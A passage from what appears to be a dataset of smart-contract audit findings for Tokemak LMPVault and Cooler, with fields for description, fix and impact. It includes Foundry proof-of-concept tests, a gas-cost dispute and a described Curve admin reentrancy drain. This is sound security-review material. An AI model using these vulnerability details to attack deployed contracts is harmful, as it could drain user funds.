(!_vaultsByType[vaultType].remove(vaultAddress)) revert VaultNotFound(vaultAddress);\\n\\n emit VaultRemoved(asset, vaultAddress);\\n }\\n```\\nчThe `addVault` function is broken in the edge case when the updater tries to add the vault back into the registry after removing it. It affects all the operations of the protocol that rely on the vault registry.ч```\\n function removeVault(address vaultAddress) external onlyUpdater {\\n Errors.verifyNotZero(vaultAddress, \"vaultAddress\");\\n\\n // remove from vaults list\\n if (!_vaults.remove(vaultAddress)) revert VaultNotFound(vaultAddress);\\n\\n address asset = ILMPVault(vaultAddress).asset();\\n\\n // remove from assets list if this was the last vault for that asset\\n if (_vaultsByAsset[asset].length() == 1) {\\n //slither-disable-next-line unused-return\\n _assets.remove(asset);\\n }\\n\\n // remove from vaultsByAsset mapping\\n if (!_vaultsByAsset[asset].remove(vaultAddress)) revert VaultNotFound(vaultAddress);\\n\\n emit VaultRemoved(asset, vaultAddress);\\n }\\n```\\n -LMPVault.updateDebtReporting could underflow because of subtraction before additionчmediumч`debt = totalDebt - prevNTotalDebt + afterNTotalDebt` where prevNTotalDebt equals `(destInfo.currentDebt * originalShares) / Math.max(destInfo.ownedShares, 1)` and the key to finding a scenario for underflow starts by noting that each value deducted from totalDebt is calculated as `cachedCurrentDebt.mulDiv(sharesToBurn, cachedDvShares, Math.Rounding.Up)`\\nLMPDebt\\n```\\n// rest of code\\nL292 totalDebtBurn = cachedCurrentDebt.mulDiv(sharesToBurn, cachedDvShares, Math.Rounding.Up);\\n// rest of code\\nL440 uint256 currentDebt = (destInfo.currentDebt * originalShares) / Math.max(destInfo.ownedShares, 1);\\nL448 totalDebtDecrease = currentDebt;\\n```\\n\\nLet: `totalDebt = destInfo.currentDebt = destInfo.debtBasis = cachedCurrentDebt = cachedDebtBasis = 11` `totalSupply = destInfo.ownedShares = cachedDvShares = 10`\\nThat way: `cachedCurrentDebt * 1 / cachedDvShares = 1.1` but totalDebtBurn would be rounded up to 2\\n`sharesToBurn` could easily be 1 if there was a loss that changes the ratio from `1:1.1` to `1:1`. Therefore `currentDvDebtValue = 10 * 1 = 10`\\n```\\nif (currentDvDebtValue < updatedDebtBasis) {\\n // We are currently sitting at a loss. Limit the value we can pull from\\n // the destination vault\\n currentDvDebtValue = currentDvDebtValue.mulDiv(userShares, totalVaultShares, Math.Rounding.Down);\\n currentDvShares = currentDvShares.mulDiv(userShares, totalVaultShares, Math.Rounding.Down);\\n}\\n\\n// Shouldn't pull more than we want\\n// Or, we're not in profit so we limit the pull\\nif (currentDvDebtValue < maxAssetsToPull) {\\n maxAssetsToPull = currentDvDebtValue;\\n}\\n\\n// Calculate the portion of shares to burn based on the assets we need to pull\\n// and the current total debt value. These are destination vault shares.\\nsharesToBurn = currentDvShares.mulDiv(maxAssetsToPull, currentDvDebtValue, Math.Rounding.Up);\\n```\\n\\nSteps\\ncall redeem 1 share and previewRedeem request 1 `maxAssetsToPull`\\n2 debt would be burn\\nTherefore totalDebt = 11-2 = 9\\ncall another redeem 1 share and request another 1 `maxAssetsToPull`\\n2 debts would be burn again and\\ntotalDebt would be 7, but prevNTotalDebt = 11 * 8 // 10 = 8\\nUsing 1, 10 and 11 are for illustration and the underflow could occur in several other ways. E.g if we had used `100,001`, `1,000,010` and `1,000,011` respectively.чAdd before subtracting. ETH in circulation is not enough to cause an overflow.\\n```\\n- debt = totalDebt - prevNTotalDebt + afterNTotalDebt\\n+ debt = totalDebt + afterNTotalDebt - prevNTotalDebt\\n```\\nч_updateDebtReporting could underflow and break a very important core functionality of the protocol. updateDebtReporting is so critical that funds could be lost if it doesn't work. Funds could be lost both when the vault is in profit or at loss.\\nIf in profit, users would want to call updateDebtReporting so that they get more asset for their shares (based on the profit).\\nIf in loss, the whole vault asset is locked and withdrawals won't be successful because the Net Asset Value is not supposed to reduce by such action (noNavDecrease modifier). Net Asset Value has reduced because the loss would reduce totalDebt, but the only way to update the totalDebt record is by calling updateDebtReporting. And those impacted the most are those with large funds. The bigger the fund, the more NAV would decrease by withdrawals.ч```\\n// rest of code\\nL292 totalDebtBurn = cachedCurrentDebt.mulDiv(sharesToBurn, cachedDvShares, Math.Rounding.Up);\\n// rest of code\\nL440 uint256 currentDebt = (destInfo.currentDebt * originalShares) / Math.max(destInfo.ownedShares, 1);\\nL448 totalDebtDecrease = currentDebt;\\n```\\n -LMPVault: DoS when `feeSink` balance hits `perWalletLimit`чmediumч`_collectFees` mints shares to `feeSink`.\\n```\\nfunction _collectFees(uint256 idle, uint256 debt, uint256 totalSupply) internal {\\n address sink = feeSink;\\n // rest of code.\\n if (fees > 0 && sink != address(0)) {\\n // Calculated separate from other mints as normal share mint is round down\\n shares = _convertToShares(fees, Math.Rounding.Up);\\n _mint(sink, shares);\\n emit Deposit(address(this), sink, fees, shares);\\n }\\n // rest of code.\\n}\\n```\\n\\n`_mint` calls `_beforeTokenTransfer` internally to check if the target wallet exceeds `perWalletLimit`.\\n```\\nfunction _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual override whenNotPaused {\\n // rest of code.\\n if (balanceOf(to) + amount > perWalletLimit) {\\n revert OverWalletLimit(to);\\n }\\n}\\n```\\n\\n`_collectFees` function will revert if `balanceOf(feeSink) + fee shares > perWalletLimit`. `updateDebtReporting`, `rebalance` and `flashRebalance` call `_collectFees` internally so they will be unfunctional.чAllow `feeSink` to exceeds `perWalletLimit`.ч`updateDebtReporting`, `rebalance` and `flashRebalance` won't be working if `feeSink` balance hits `perWalletLimit`.ч```\\nfunction _collectFees(uint256 idle, uint256 debt, uint256 totalSupply) internal {\\n address sink = feeSink;\\n // rest of code.\\n if (fees > 0 && sink != address(0)) {\\n // Calculated separate from other mints as normal share mint is round down\\n shares = _convertToShares(fees, Math.Rounding.Up);\\n _mint(sink, shares);\\n emit Deposit(address(this), sink, fees, shares);\\n }\\n // rest of code.\\n}\\n```\\n -Incorrect amount given as input to `_handleRebalanceIn` when `flashRebalance` is calledчmediumчThe issue occurs in the `flashRebalance` function below :\\n```\\nfunction flashRebalance(\\n DestinationInfo storage destInfoOut,\\n DestinationInfo storage destInfoIn,\\n IERC3156FlashBorrower receiver,\\n IStrategy.RebalanceParams memory params,\\n FlashRebalanceParams memory flashParams,\\n bytes calldata data\\n) external returns (uint256 idle, uint256 debt) {\\n // rest of code\\n\\n // Handle increase (shares coming \"In\", getting underlying from the swapper and trading for new shares)\\n if (params.amountIn > 0) {\\n IDestinationVault dvIn = IDestinationVault(params.destinationIn);\\n\\n // get \"before\" counts\\n uint256 tokenInBalanceBefore = IERC20(params.tokenIn).balanceOf(address(this));\\n\\n // Give control back to the solver so they can make use of the \"out\" assets\\n // and get our \"in\" asset\\n bytes32 flashResult = receiver.onFlashLoan(msg.sender, params.tokenIn, params.amountIn, 0, data);\\n\\n // We assume the solver will send us the assets\\n uint256 tokenInBalanceAfter = IERC20(params.tokenIn).balanceOf(address(this));\\n\\n // Make sure the call was successful and verify we have at least the assets we think\\n // we were getting\\n if (\\n flashResult != keccak256(\"ERC3156FlashBorrower.onFlashLoan\")\\n || tokenInBalanceAfter < tokenInBalanceBefore + params.amountIn\\n ) {\\n revert Errors.FlashLoanFailed(params.tokenIn, params.amountIn);\\n }\\n\\n if (params.tokenIn != address(flashParams.baseAsset)) {\\n // @audit should be `tokenInBalanceAfter - tokenInBalanceBefore` given to `_handleRebalanceIn`\\n (uint256 debtDecreaseIn, uint256 debtIncreaseIn) =\\n _handleRebalanceIn(destInfoIn, dvIn, params.tokenIn, tokenInBalanceAfter);\\n idleDebtChange.debtDecrease += debtDecreaseIn;\\n idleDebtChange.debtIncrease += debtIncreaseIn;\\n } else {\\n idleDebtChange.idleIncrease += tokenInBalanceAfter - tokenInBalanceBefore;\\n }\\n }\\n // rest of code\\n}\\n```\\n\\nAs we can see from the code above, the function executes a flashloan in order to receive th tokenIn amount which should be the difference between `tokenInBalanceAfter` (balance of the contract after the flashloan) and `tokenInBalanceBefore` (balance of the contract before the flashloan) : `tokenInBalanceAfter` - `tokenInBalanceBefore`.\\nBut when calling the `_handleRebalanceIn` function the wrong deposit amount is given as input, as the total balance `tokenInBalanceAfter` is used instead of the received amount `tokenInBalanceAfter` - tokenInBalanceBefore.\\nBecause the `_handleRebalanceIn` function is supposed to deposit the input amount to the destination vault, this error can result in sending a larger amount of funds to DV then what was intended or this error can cause a DOS of the `flashRebalance` function (due to the insufficient amount error when performing the transfer to DV), all of this will make the rebalance operation fail (or not done correctely) which can have a negative impact on the LMPVault.чUse the correct received tokenIn amount `tokenInBalanceAfter - tokenInBalanceBefore` as input to the `_handleRebalanceIn` function :\\n```\\nfunction flashRebalance(\\n DestinationInfo storage destInfoOut,\\n DestinationInfo storage destInfoIn,\\n IERC3156FlashBorrower receiver,\\n IStrategy.RebalanceParams memory params,\\n FlashRebalanceParams memory flashParams,\\n bytes calldata data\\n) external returns (uint256 idle, uint256 debt) {\\n // rest of code\\n\\n // Handle increase (shares coming \"In\", getting underlying from the swapper and trading for new shares)\\n if (params.amountIn > 0) {\\n IDestinationVault dvIn = IDestinationVault(params.destinationIn);\\n\\n // get \"before\" counts\\n uint256 tokenInBalanceBefore = IERC20(params.tokenIn).balanceOf(address(this));\\n\\n // Give control back to the solver so they can make use of the \"out\" assets\\n // and get our \"in\" asset\\n bytes32 flashResult = receiver.onFlashLoan(msg.sender, params.tokenIn, params.amountIn, 0, data);\\n\\n // We assume the solver will send us the assets\\n uint256 tokenInBalanceAfter = IERC20(params.tokenIn).balanceOf(address(this));\\n\\n // Make sure the call was successful and verify we have at least the assets we think\\n // we were getting\\n if (\\n flashResult != keccak256(\"ERC3156FlashBorrower.onFlashLoan\")\\n || tokenInBalanceAfter < tokenInBalanceBefore + params.amountIn\\n ) {\\n revert Errors.FlashLoanFailed(params.tokenIn, params.amountIn);\\n }\\n\\n if (params.tokenIn != address(flashParams.baseAsset)) {\\n // @audit Use `tokenInBalanceAfter - tokenInBalanceBefore` as input\\n (uint256 debtDecreaseIn, uint256 debtIncreaseIn) =\\n _handleRebalanceIn(destInfoIn, dvIn, params.tokenIn, tokenInBalanceAfter - tokenInBalanceBefore);\\n idleDebtChange.debtDecrease += debtDecreaseIn;\\n idleDebtChange.debtIncrease += debtIncreaseIn;\\n } else {\\n idleDebtChange.idleIncrease += tokenInBalanceAfter - tokenInBalanceBefore;\\n }\\n }\\n // rest of code\\n}\\n```\\nчSee summaryч```\\nfunction flashRebalance(\\n DestinationInfo storage destInfoOut,\\n DestinationInfo storage destInfoIn,\\n IERC3156FlashBorrower receiver,\\n IStrategy.RebalanceParams memory params,\\n FlashRebalanceParams memory flashParams,\\n bytes calldata data\\n) external returns (uint256 idle, uint256 debt) {\\n // rest of code\\n\\n // Handle increase (shares coming \"In\", getting underlying from the swapper and trading for new shares)\\n if (params.amountIn > 0) {\\n IDestinationVault dvIn = IDestinationVault(params.destinationIn);\\n\\n // get \"before\" counts\\n uint256 tokenInBalanceBefore = IERC20(params.tokenIn).balanceOf(address(this));\\n\\n // Give control back to the solver so they can make use of the \"out\" assets\\n // and get our \"in\" asset\\n bytes32 flashResult = receiver.onFlashLoan(msg.sender, params.tokenIn, params.amountIn, 0, data);\\n\\n // We assume the solver will send us the assets\\n uint256 tokenInBalanceAfter = IERC20(params.tokenIn).balanceOf(address(this));\\n\\n // Make sure the call was successful and verify we have at least the assets we think\\n // we were getting\\n if (\\n flashResult != keccak256(\"ERC3156FlashBorrower.onFlashLoan\")\\n || tokenInBalanceAfter < tokenInBalanceBefore + params.amountIn\\n ) {\\n revert Errors.FlashLoanFailed(params.tokenIn, params.amountIn);\\n }\\n\\n if (params.tokenIn != address(flashParams.baseAsset)) {\\n // @audit should be `tokenInBalanceAfter - tokenInBalanceBefore` given to `_handleRebalanceIn`\\n (uint256 debtDecreaseIn, uint256 debtIncreaseIn) =\\n _handleRebalanceIn(destInfoIn, dvIn, params.tokenIn, tokenInBalanceAfter);\\n idleDebtChange.debtDecrease += debtDecreaseIn;\\n idleDebtChange.debtIncrease += debtIncreaseIn;\\n } else {\\n idleDebtChange.idleIncrease += tokenInBalanceAfter - tokenInBalanceBefore;\\n }\\n }\\n // rest of code\\n}\\n```\\n -OOG / unexpected reverts due to incorrect usage of staticcall.чmediumчThe function `checkReentrancy` in `BalancerUtilities.sol` is used to check if the balancer contract has been re-entered or not. It does this by doing a `staticcall` on the pool contract and checking the return value. According to the solidity docs, if a `staticcall` encounters a state change, it burns up all gas and returns. The `checkReentrancy` tries to call `manageUserBalance` on the vault contract, and returns if it finds a state change.\\nThe issue is that this burns up all the gas sent with the call. According to EIP150, a call gets allocated 63/64 bits of the gas, and the entire 63/64 parts of the gas is burnt up after the staticcall, since the staticcall will always encounter a storage change. This is also highlighted in the balancer monorepo, which has guidelines on how to check re-entrancy here.\\nThis can also be shown with a simple POC.\\n```\\nunction testAttack() public {\\n mockRootPrice(WSTETH, 1_123_300_000_000_000_000); //wstETH\\n mockRootPrice(CBETH, 1_034_300_000_000_000_000); //cbETH\\n\\n IBalancerMetaStablePool pool = IBalancerMetaStablePool(WSTETH_CBETH_POOL);\\n\\n address[] memory assets = new address[](2);\\n assets[0] = WSTETH;\\n assets[1] = CBETH;\\n uint256[] memory amounts = new uint256[](2);\\n amounts[0] = 10_000 ether;\\n amounts[1] = 0;\\n\\n IBalancerVault.JoinPoolRequest memory joinRequest = IBalancerVault.JoinPoolRequest({\\n assets: assets,\\n maxAmountsIn: amounts, // maxAmountsIn,\\n userData: abi.encode(\\n IBalancerVault.JoinKind.EXACT_TOKENS_IN_FOR_BPT_OUT,\\n amounts, //maxAmountsIn,\\n 0\\n ),\\n fromInternalBalance: false\\n });\\n\\n IBalancerVault.SingleSwap memory swapRequest = IBalancerVault.SingleSwap({\\n poolId: 0x9c6d47ff73e0f5e51be5fd53236e3f595c5793f200020000000000000000042c,\\n kind: IBalancerVault.SwapKind.GIVEN_IN,\\n assetIn: WSTETH,\\n assetOut: CBETH,\\n amount: amounts[0],\\n userData: abi.encode(\\n IBalancerVault.JoinKind.EXACT_TOKENS_IN_FOR_BPT_OUT,\\n amounts, //maxAmountsIn,\\n 0\\n )\\n });\\n\\n IBalancerVault.FundManagement memory funds = IBalancerVault.FundManagement({\\n sender: address(this),\\n fromInternalBalance: false,\\n recipient: payable(address(this)),\\n toInternalBalance: false\\n });\\n\\n emit log_named_uint(\"Gas before price1\", gasleft());\\n uint256 price1 = oracle.getPriceInEth(WSTETH_CBETH_POOL);\\n emit log_named_uint(\"price1\", price1);\\n emit log_named_uint(\"Gas after price1 \", gasleft());\\n }\\n```\\n\\nThe oracle is called to get a price. This oracle calls the `checkReentrancy` function and burns up the gas. The gas left is checked before and after this call.\\nThe output shows this:\\n```\\n[PASS] testAttack() (gas: 9203730962297323943)\\nLogs:\\nGas before price1: 9223372036854745204\\nprice1: 1006294352158612428\\nGas after price1 : 425625349158468958\\n```\\n\\nThis shows that 96% of the gas sent is burnt up in the oracle call.чAccording to the monorepo here, the staticall must be allocated a fixed amount of gas. Change the reentrancy check to the following.\\n```\\n(, bytes memory revertData) = address(vault).staticcall{ gas: 10_000 }(\\n abi.encodeWithSelector(vault.manageUserBalance.selector, 0)\\n );\\n```\\n\\nThis ensures gas isn't burnt up without reason.чThis causes the contract to burn up 63/64 bits of gas in a single check. If there are lots of operations after this call, the call can revert due to running out of gas. This can lead to a DOS of the contract.\\nCurrent opinion is to reject escalation and keep issue medium severity.\\nJeffCX\\nPutting a limit on the gas is not a task for the protocol\\nsir, please read the report again, the flawed logic in the code charge user 100x gas in every transaction in every withdrawal\\nin a single transaction, the cost burnt can by minimal\\nidk how do state it more clearly, emm if you put money in the bank, you expect to pay 1 USD for withdrawal transaction fee, but every time you have to pay 100 USD withdrawal fee because of the bug\\nthis cause loss of fund for every user in every transaction for not only you but every user...\\nEvert0x\\n@JeffCX what are the exact numbers on the withdrawal costs? E.g. if I want to withdraw $10k, how much gas can I expect to pay? If this is a significant amount I can see the argument for\\nHow to identify a high issue: Definite loss of funds without limiting external conditions.\\nBut it's not clear how much this will be assuming current mainnet conditions.\\nJeffCX\\nI write a simpe POC\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity ^0.8.13;\\n\\nimport \"forge-std/Test.sol\";\\nimport \"forge-std/console.sol\";\\n\\nimport \"@openzeppelin/contracts/token/ERC20/ERC20.sol\";\\n\\ncontract MockERC20 is ERC20 {\\n constructor()ERC20(\"MyToken\", \"MTK\")\\n {}\\n\\n function mint(address to, uint256 amount) public {\\n _mint(to, amount);\\n }\\n}\\n\\ninterface ICheckRetrancy {\\n function checkRentrancy() external;\\n}\\n\\ncontract RentrancyCheck {\\n\\n\\n uint256 state = 10;\\n\\n function checkRentrancy() external {\\n address(this).staticcall(abi.encodeWithSignature(\"hihi()\"));\\n }\\n\\n function hihi() public {\\n state = 11;\\n }\\n\\n}\\n\\ncontract Vault {\\n\\n address balancerAddr;\\n bool checkRentrancy;\\n\\n constructor(bool _checkRentrancy, address _balancerAddr) {\\n checkRentrancy = _checkRentrancy;\\n balancerAddr = _balancerAddr;\\n }\\n\\n function toggleCheck(bool _state) public {\\n checkRentrancy = _state;\\n }\\n\\n function withdraw(address token, uint256 amount) public {\\n\\n if(checkRentrancy) {\\n ICheckRetrancy(balancerAddr).checkRentrancy();\\n }\\n\\n IERC20(token).transfer(msg.sender, amount);\\n \\n }\\n\\n}\\n\\n\\ncontract CounterTest is Test {\\n\\n using stdStorage for StdStorage;\\n StdStorage stdlib;\\n\\n MockERC20 token;\\n Vault vault;\\n RentrancyCheck rentrancyCheck;\\n\\n address user = vm.addr(5201314);\\n\\n function setUp() public {\\n \\n token = new MockERC20();\\n rentrancyCheck = new RentrancyCheck();\\n vault = new Vault(false, address(rentrancyCheck));\\n token.mint(address(vault), 100000000 ether);\\n\\n vm.deal(user, 100 ether);\\n \\n // vault.toggleCheck(true);\\n\\n }\\n\\n function testPOC() public {\\n\\n uint256 gas = gasleft();\\n uint256 amount = 100 ether;\\n vault.withdraw(address(token), amount);\\n console.log(gas - gasleft());\\n\\n }\\n\\n}\\n```\\n\\nthe call is\\n```\\nif check reentrancy flag is true\\n\\nuser withdraw -> \\ncheck reentrancy staticall revert and consume most of the gas \\n-> withdraw completed\\n```\\n\\nor\\n```\\nif check reentrancy flag is false\\n\\nuser withdraw ->\\n-> withdraw completed\\n```\\n\\nnote first we do not check the reentrancy\\n```\\n// vault.toggleCheck(true);\\n```\\n\\nwe run\\nthe gas cost is 42335\\n```\\nRunning 1 test for test/Counter.t.sol:CounterTest\\n[PASS] testPOC() (gas: 45438)\\nLogs:\\n 42335\\n```\\n\\nthen we uncomment the vault.toggleCheck(true) and check the reentrancy that revert in staticcall\\n```\\nvault.toggleCheck(true);\\n```\\n\\nwe run the same test again, this is the output, as we can see the gas cost surge\\n```\\nRunning 1 test for test/Counter.t.sol:CounterTest\\n[PASS] testPOC() (gas: 9554791)\\nLogs:\\n 9551688\\n```\\n\\nthen we can use this python scirpt to estimate how much gas is overpaid as lost of fund\\n```\\nregular = 42313\\n\\noverpaid = 9551666\\n\\n\\ncost = 0.000000045 * (overpaid - regular);\\n\\nprint(cost)\\n```\\n\\nthe cost is\\n```\\n0.427920885 ETH\\n```\\n\\nin a single withdraw, assume user lost 0.427 ETH,\\nif 500 user withdraw 20 times each and the total number of transaction is 10000\\nthe lose on gas is 10000 * 0.427 ETH\\nJeffCX\\nnote that the more gas limit user set, the more fund user lose in gas\\nbut we are interested in what the lowest amount of gas limit user that user can set the pay for withdrawal transaction\\nI did some fuzzing\\nthat number is 1800000 unit of gas\\nthe command to run the test is\\nsetting gas limit lower than 1800000 unit of gas is likely to revert in out of gas\\nunder this setting, the overpaid transaction cost is 1730089\\n```\\nRunning 1 test for test/Counter.t.sol:CounterTest\\n[PASS] testPOC() (gas: 1733192)\\nLogs:\\n 1730089\\n```\\n\\nin other words,\\nin each withdrawal for every user, user can lose 0.073 ETH, (1730089 uint of gas * 45 gwei -> 0.000000045 ETH)\\nassume there are 1000 user, each withdraw 10 times, they make 1000 * 10 = 100_00 transaction\\nso the total lost is 100_00 * 0.07 = 700 ETH\\nin reality the gas is more than that because user may use more than 1800000 unit of gas to finalize the withdrawal transaction\\nEvert0x\\n@JeffCX thanks for putting in the effort to make this estimation.\\nBut as far as I can see, your estimation doesn't use the actual contracts in scope. But maybe that's irrelevant to make your point.\\nThis seems like the key sentence\\nin each withdrawal for every user, user can lose 0.073 ETH,\\nThis is an extra $100-$150 dollars per withdrawal action.\\nThis is not a very significant amount in my opinion. I assume an optimized withdrawal transaction will cost between $20-$50. So the difference is not as big.\\nJeffCX\\nSir, I don't think the method A and method B example applies in the codebase and in this issue\\nthere is only one method for user to withdraw share from the vault\\nI can add more detail to explain how this impact withdraw using top-down approach\\nUser can withdraw by calling withdraw in LMPVault.sol and triggers _withdraw\\nthe _withdraw calls the method _calcUserWithdrawSharesToBurn\\nthis calls LMPDebt._calcUserWithdrawSharesToBurn\\nwe need to know the debt value by calling destVault.debtValue\\nthis calls this line of code\\nthis calls the oracle code\\n`uint256 price = _systemRegistry.rootPriceOracle().getPriceInEth(_underlying);`\\nthen if the dest vault is the balancer vault, balancer reetrancy check is triggered to waste 63 / 64 waste in oracle code\\nso there is no function A and function B call\\nas long as user can withdraw and wants to withdraw share from balancer vault, 100x gas overpayment is required\\nthe POC is a simplified flow of this\\nit is ok to disagree sir:)\\nEvert0x\\nResult: Medium Has Duplicates\\nsherlock-admin2\\nEscalations have been resolved successfully!\\nEscalation status:\\nJEFFCX: rejectedч```\\nunction testAttack() public {\\n mockRootPrice(WSTETH, 1_123_300_000_000_000_000); //wstETH\\n mockRootPrice(CBETH, 1_034_300_000_000_000_000); //cbETH\\n\\n IBalancerMetaStablePool pool = IBalancerMetaStablePool(WSTETH_CBETH_POOL);\\n\\n address[] memory assets = new address[](2);\\n assets[0] = WSTETH;\\n assets[1] = CBETH;\\n uint256[] memory amounts = new uint256[](2);\\n amounts[0] = 10_000 ether;\\n amounts[1] = 0;\\n\\n IBalancerVault.JoinPoolRequest memory joinRequest = IBalancerVault.JoinPoolRequest({\\n assets: assets,\\n maxAmountsIn: amounts, // maxAmountsIn,\\n userData: abi.encode(\\n IBalancerVault.JoinKind.EXACT_TOKENS_IN_FOR_BPT_OUT,\\n amounts, //maxAmountsIn,\\n 0\\n ),\\n fromInternalBalance: false\\n });\\n\\n IBalancerVault.SingleSwap memory swapRequest = IBalancerVault.SingleSwap({\\n poolId: 0x9c6d47ff73e0f5e51be5fd53236e3f595c5793f200020000000000000000042c,\\n kind: IBalancerVault.SwapKind.GIVEN_IN,\\n assetIn: WSTETH,\\n assetOut: CBETH,\\n amount: amounts[0],\\n userData: abi.encode(\\n IBalancerVault.JoinKind.EXACT_TOKENS_IN_FOR_BPT_OUT,\\n amounts, //maxAmountsIn,\\n 0\\n )\\n });\\n\\n IBalancerVault.FundManagement memory funds = IBalancerVault.FundManagement({\\n sender: address(this),\\n fromInternalBalance: false,\\n recipient: payable(address(this)),\\n toInternalBalance: false\\n });\\n\\n emit log_named_uint(\"Gas before price1\", gasleft());\\n uint256 price1 = oracle.getPriceInEth(WSTETH_CBETH_POOL);\\n emit log_named_uint(\"price1\", price1);\\n emit log_named_uint(\"Gas after price1 \", gasleft());\\n }\\n```\\n -Slashing during `LSTCalculatorBase.sol` deployment can show bad apr for monthsчmediumчThe contract `LSTCalculatorBase.sol` has some functions to calculate the rough APR expected from a liquid staking token. The contract is first deployed, and the first snapshot is taken after `APR_FILTER_INIT_INTERVAL_IN_SEC`, which is 9 days. It then calculates the APR between the deployment and this first snapshot, and uses that to initialize the APR value. It uses the function `calculateAnnualizedChangeMinZero` to do this calculation.\\nThe issue is that the function `calculateAnnualizedChangeMinZero` has a floor of 0. So if the backing of the LST decreases over that 9 days due to a slashing event in that interval, this function will return 0, and the initial APR and `baseApr` will be set to 0.\\nThe calculator is designed to update the APR at regular intervals of 3 days. However, the new apr is given a weight of 10% and the older apr is given a weight of 90% as seen below.\\n```\\nreturn ((priorValue * (1e18 - alpha)) + (currentValue * alpha)) / 1e18;\\n```\\n\\nAnd alpha is hardcoded to 0.1. So if the initial APR starts at 0 due to a slashing event in the initial 9 day period, a large number of updates will be required to bring the APR up to the correct value.\\nAssuming the correct APR of 6%, and an initial APR of 0%, we can calculate that it takes upto 28 updates to reflect close the correct APR. This transaltes to 84 days. So the wrong APR cann be shown for upto 3 months. Tha protocol uses these APR values to justify the allocation to the various protocols. Thus a wrong APR for months would mean the protocol would sub optimally allocate funds for months, losing potential yield.чIt is recommended to initialize the APR with a specified value, rather than calculate it over the initial 9 days. 9 day window is not good enough to get an accurate APR, and can be easily manipulated by a slashing event.чThe protocol can underperform for months due to slashing events messing up APR calculations close to deployment date.ч```\\nreturn ((priorValue * (1e18 - alpha)) + (currentValue * alpha)) / 1e18;\\n```\\n -curve admin can drain pool via reentrancy (equal to execute emergency withdraw and rug tokenmak fund by third party)чmediumчA few curve liquidity is pool is well in-scope:\\n```\\nCurve Pools\\n\\nCurve stETH/ETH: 0x06325440D014e39736583c165C2963BA99fAf14E\\nCurve stETH/ETH ng: 0x21E27a5E5513D6e65C4f830167390997aA84843a\\nCurve stETH/ETH concentrated: 0x828b154032950C8ff7CF8085D841723Db2696056\\nCurve stETH/frxETH: 0x4d9f9D15101EEC665F77210cB999639f760F831E\\nCurve rETH/ETH: 0x6c38cE8984a890F5e46e6dF6117C26b3F1EcfC9C\\nCurve rETH/wstETH: 0x447Ddd4960d9fdBF6af9a790560d0AF76795CB08\\nCurve rETH/frxETH: 0xbA6c373992AD8ec1f7520E5878E5540Eb36DeBf1\\nCurve cbETH/ETH: 0x5b6C539b224014A09B3388e51CaAA8e354c959C8\\nCurve cbETH/frxETH: 0x548E063CE6F3BaC31457E4f5b4e2345286274257\\nCurve frxETH/ETH: 0xf43211935C781D5ca1a41d2041F397B8A7366C7A\\nCurve swETH/frxETH: 0xe49AdDc2D1A131c6b8145F0EBa1C946B7198e0BA\\n```\\n\\none of the pool is 0x21E27a5E5513D6e65C4f830167390997aA84843a\\nAdmin of curve pools can easily drain curve pools via reentrancy or via the `withdraw_admin_fees` function.\\n```\\n@external\\ndef withdraw_admin_fees():\\n receiver: address = Factory(self.factory).get_fee_receiver(self)\\n\\n amount: uint256 = self.admin_balances[0]\\n if amount != 0:\\n raw_call(receiver, b\"\", value=amount)\\n\\n amount = self.admin_balances[1]\\n if amount != 0:\\n assert ERC20(self.coins[1]).transfer(receiver, amount, default_return_value=True)\\n\\n self.admin_balances = empty(uint256[N_COINS])\\n```\\n\\nif admin of the curve can set a receiver to a malicious smart contract and reenter withdraw_admin_fees a 1000 times to drain the pool even the admin_balances is small\\nthe line of code\\n```\\nraw_call(receiver, b\"\", value=amount)\\n```\\n\\ntrigger the reentrancy\\nThis is a problem because as stated by the tokemak team:\\nIn case of external protocol integrations, are the risks of external contracts pausing or executing an emergency withdrawal acceptable? If not, Watsons will submit issues related to these situations that can harm your protocol's functionality.\\nPausing or emergency withdrawals are not acceptable for Tokemak.\\nAs you can see above, pausing or emergency withdrawals are not acceptable, and this is possible for cuve pools so this is a valid issue according to the protocol and according to the read meчN/Aчcurve admins can drain pool via reentrancyч```\\nCurve Pools\\n\\nCurve stETH/ETH: 0x06325440D014e39736583c165C2963BA99fAf14E\\nCurve stETH/ETH ng: 0x21E27a5E5513D6e65C4f830167390997aA84843a\\nCurve stETH/ETH concentrated: 0x828b154032950C8ff7CF8085D841723Db2696056\\nCurve stETH/frxETH: 0x4d9f9D15101EEC665F77210cB999639f760F831E\\nCurve rETH/ETH: 0x6c38cE8984a890F5e46e6dF6117C26b3F1EcfC9C\\nCurve rETH/wstETH: 0x447Ddd4960d9fdBF6af9a790560d0AF76795CB08\\nCurve rETH/frxETH: 0xbA6c373992AD8ec1f7520E5878E5540Eb36DeBf1\\nCurve cbETH/ETH: 0x5b6C539b224014A09B3388e51CaAA8e354c959C8\\nCurve cbETH/frxETH: 0x548E063CE6F3BaC31457E4f5b4e2345286274257\\nCurve frxETH/ETH: 0xf43211935C781D5ca1a41d2041F397B8A7366C7A\\nCurve swETH/frxETH: 0xe49AdDc2D1A131c6b8145F0EBa1C946B7198e0BA\\n```\\n -At claimDefaulted, the lender may not receive the token because the Unclaimed token is not processedчhighч```\\nfunction claimDefaulted(uint256 loanID_) external returns (uint256, uint256, uint256) {\\n Loan memory loan = loans[loanID_];\\n delete loans[loanID_];\\n```\\n\\nLoan data is deletead in `claimDefaulted` function. `loan.unclaimed` is not checked before data deletead. So, if `claimDefaulted` is called while there are unclaimed tokens, the lender will not be able to get the unclaimed tokens.чProcess unclaimed tokens before deleting loan data.\\n```\\nfunction claimDefaulted(uint256 loanID_) external returns (uint256, uint256, uint256) {\\n// Add the line below\\n claimRepaid(loanID_)\\n Loan memory loan = loans[loanID_];\\n delete loans[loanID_];\\n```\\nчLender cannot get unclaimed token.ч```\\nfunction claimDefaulted(uint256 loanID_) external returns (uint256, uint256, uint256) {\\n Loan memory loan = loans[loanID_];\\n delete loans[loanID_];\\n```\\n -isCoolerCallback can be bypassedчhighчThe `CoolerCallback.isCoolerCallback()` is intended to ensure that the lender implements the `CoolerCallback` abstract at line 241 when the parameter `isCallback_` is `true`.\\n```\\nfunction clearRequest(\\n uint256 reqID_,\\n bool repayDirect_,\\n bool isCallback_\\n) external returns (uint256 loanID) {\\n Request memory req = requests[reqID_];\\n\\n // If necessary, ensure lender implements the CoolerCallback abstract.\\n if (isCallback_ && !CoolerCallback(msg.sender).isCoolerCallback()) revert NotCoolerCallback();\\n\\n // Ensure loan request is active. \\n if (!req.active) revert Deactivated();\\n\\n // Clear the loan request in memory.\\n req.active = false;\\n\\n // Calculate and store loan terms.\\n uint256 interest = 